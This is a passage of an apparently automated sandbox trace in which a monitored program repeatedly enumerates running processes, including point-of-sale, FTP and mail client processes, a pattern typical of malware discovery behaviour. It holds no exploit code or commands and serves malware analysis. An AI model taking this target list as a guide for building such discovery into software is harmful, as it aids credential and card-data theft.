cntUsage=0x0, th32ProcessID=0x129c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="begin.exe")) returned 1 [0167.037] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="omnipos.exe")) returned 1 [0167.040] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="utg2.exe")) returned 1 [0167.042] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12b4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spcwin.exe")) returned 1 [0167.045] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="weapon.exe")) returned 1 [0167.047] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x12c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="spgagentservice.exe")) returned 1 [0167.049] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x13c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x3a4, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0167.053] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1398, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0167.055] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x464, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x60, pcPriClassBase=6, dwFlags=0x0, szExeFile="msfeedssync.exe")) returned 1 [0167.057] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x890, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0167.060] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0167.062] Process32Next (in: hSnapshot=0x1c70, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xcc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x37c, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 0 [0167.064] CloseHandle (hObject=0x1c70) returned 1 [0167.064] Sleep (dwMilliseconds=0x64) [0167.259] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1f84 [0167.273] Process32First (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0167.276] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x72, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0167.278] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x130, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0167.280] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0167.283] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0167.287] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0167.289] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x200, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x1b8, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0167.292] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x218, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0167.294] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x220, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c0, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0167.297] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x278, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3c, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.304] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.307] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x32c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x200, pcPriClassBase=13, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0167.308] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x360, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.310] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x37c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.312] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x38c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.314] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.315] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.317] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x60, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4a, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.319] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x19, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.321] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0167.322] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="sihost.exe")) returned 1 [0167.324] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x640, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x30, th32ParentProcessID=0x620, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0167.325] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x674, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="RuntimeBroker.exe")) returned 1 [0167.327] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x6dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.329] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x7d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="ShellExperienceHost.exe")) returned 1 [0167.331] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x558, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SearchUI.exe")) returned 1 [0167.333] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x824, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x22, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="SkypeHost.exe")) returned 1 [0167.334] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x884, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0167.336] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x8f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0167.337] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xa74, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhostw.exe")) returned 1 [0167.339] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.346] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xc6c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0167.348] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xf00, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x60, pcPriClassBase=8, dwFlags=0x0, szExeFile="WMIADAP.exe")) returned 1 [0167.350] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xfdc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="sppsvc.exe")) returned 1 [0167.353] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="WmiPrvSE.exe")) returned 1 [0167.355] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x470, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x218, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0167.357] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0xbe0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0167.360] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x878, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x278, pcPriClassBase=8, dwFlags=0x0, szExeFile="backgroundTaskHost.exe")) returned 1 [0167.362] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x3a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xf, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="iexplore.exe")) returned 1 [0167.364] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1038, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="this.exe")) returned 1 [0167.365] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1040, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="love gas.exe")) returned 1 [0167.367] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1048, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="against.exe")) returned 1 [0167.368] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1064, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="borndegreereturn.exe")) returned 1 [0167.370] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1070, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="national.exe")) returned 1 [0167.373] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1078, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="our_beat.exe")) returned 1 [0167.375] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1080, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="piece.exe")) returned 1 [0167.376] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1088, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="lighttough.exe")) returned 1 [0167.378] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1090, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="factorfree.exe")) returned 1 [0167.380] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1098, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="standard.exe")) returned 1 [0167.385] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="optionalso.exe")) returned 1 [0167.387] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="speech-however-surface.exe")) returned 1 [0167.389] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="hang around rise.exe")) returned 1 [0167.390] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10e4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="kill.exe")) returned 1 [0167.392] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10f4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="disease_victim_can.exe")) returned 1 [0167.395] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x10fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="decideenergytend.exe")) returned 1 [0167.397] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x110c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="3dftp.exe")) returned 1 [0167.399] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1114, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="absolutetelnet.exe")) returned 1 [0167.401] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1120, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="alftp.exe")) returned 1 [0167.403] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1128, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="barca.exe")) returned 1 [0167.405] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x113c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="bitkinex.exe")) returned 1 [0167.408] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="coreftp.exe")) returned 1 [0167.410] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1150, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="far.exe")) returned 1 [0167.412] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1158, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="filezilla.exe")) returned 1 [0167.414] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1168, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="flashfxp.exe")) returned 1 [0167.416] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1170, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="fling.exe")) returned 1 [0167.419] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="foxmailincmail.exe")) returned 1 [0167.421] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1188, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="gmailnotifierpro.exe")) returned 1 [0167.426] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x1198, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="icq.exe")) returned 1 [0167.429] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="leechftp.exe")) returned 1 [0167.431] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="ncftp.exe")) returned 1 [0167.433] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11b0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="notepad.exe")) returned 1 [0167.435] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: lppe=0x102efe20*(dwSize=0x130, cntUsage=0x0, th32ProcessID=0x11cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x640, pcPriClassBase=8, dwFlags=0x0, szExeFile="operamail.exe")) returned 1 [0167.437] Process32Next (in: hSnapshot=0x1f84, lppe=0x102efe20 | out: 